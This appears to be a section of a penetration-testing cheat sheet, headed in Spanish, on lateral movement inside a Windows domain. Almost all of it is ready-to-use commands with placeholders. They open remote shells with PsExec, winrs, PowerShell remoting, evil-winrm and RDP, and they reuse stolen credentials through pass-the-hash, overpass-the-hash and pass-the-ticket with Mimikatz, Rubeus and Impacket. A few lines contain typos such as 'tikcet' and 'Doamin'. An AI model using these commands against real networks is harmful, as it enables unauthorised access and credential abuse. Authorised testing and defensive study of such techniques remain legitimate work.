6. Siguientes pasos

winrs -r:<HOSTNAME> cmd

.\\PsExec.exe \\\\<HOSTNAME> cmd

1- $sess = New-PSSession -ComputerName <HOST>
2- Enter-PSSession -Session $sess

1- $sess = New-PSSession -ComputerName <HOST>
2- Invoke-Command -Session $Sess -ScriptBlock {ipconfig;whoami;pwd}

Invoke-WSManWinRM -hostname <HOST> -command cmd

winrs -r:<HOST> -u:<Domain>/<USER> -p:<PASS> cmd
.\\PsExec.exe -u <Domain>/<USER> -p <PASS> \\\\<HOSTNAME> cmd
impacket-psexec <<Domain>/<USER>:<PASS>@<IP>>

#WSManWinRM
Invoke-WSManWinRM -hostname <HOST> -command cmd -user <Domain>\\<USER> -password <PASS>

evil-winrm -i <IP> -u <Domain>/<USER>' -p <PASS>

#RDP Access
rdesktop -a 16 <IP> -u <DOMAIN\\USER> -p <PASS>
xfreerdp /v:IP /u:"<USER>" /p:<PASS>

Invoke-Mimikatz -Command '"sekurlsa::pth /user:<USER> /domain:<> /ntlm:<NTLM> /run:powershell.exe"' 
impacket-psexec -hashes ":<NTLM>" <USER>@<IP>
evil-winrm -u <username> -H <Hash> -i <IP>
pth-winexe -U <Domain>/<User>%<NT:LM> //<IP> cmd

#Impacket For Win
.\\psexec_windows.exe -hashes ":<NTLM>" <USER>@<IP>

#Invoke-TheHash
Invoke-SMBExec -Target <PC.Full.Domain> -Domain <Full.Doamin> -Username <> -Hash <NTLM> -Command '<Inj SHELL>' -verbose

Rubeus.exe asktgt /user:<USER> /rc4:<NTLM> /ptt
.\\PsExec.exe -accepteula \\\\<HOST> cmd
winrs -r:<HOST> cmd

Invoke-Mimikatz -Command '"sekurlsa::pth /user:<USER> /domain:<Full.Domain> /aes256:<aes256key> /run:cmd.exe"'

1- impacket-getTGT <domain.full>/<USER> -hashes ":<NTLM>"
2- export KRB5CCNAME=$(pwd)/<USER>.ccache
3- impacket-psexec <domain.full>/<USER>@<IP> -k -no-pass

Invoke-Mimikatz -Command '"kerberos::ptt <C:\\Path\\To\\Ticket>"'
Rubeus.exe ptt /tikcet:<base64 Ticket>

#access
.\\PsExec.exe -accepteula \\\\<HOST> cmd
winrs -r:<HOST> cmd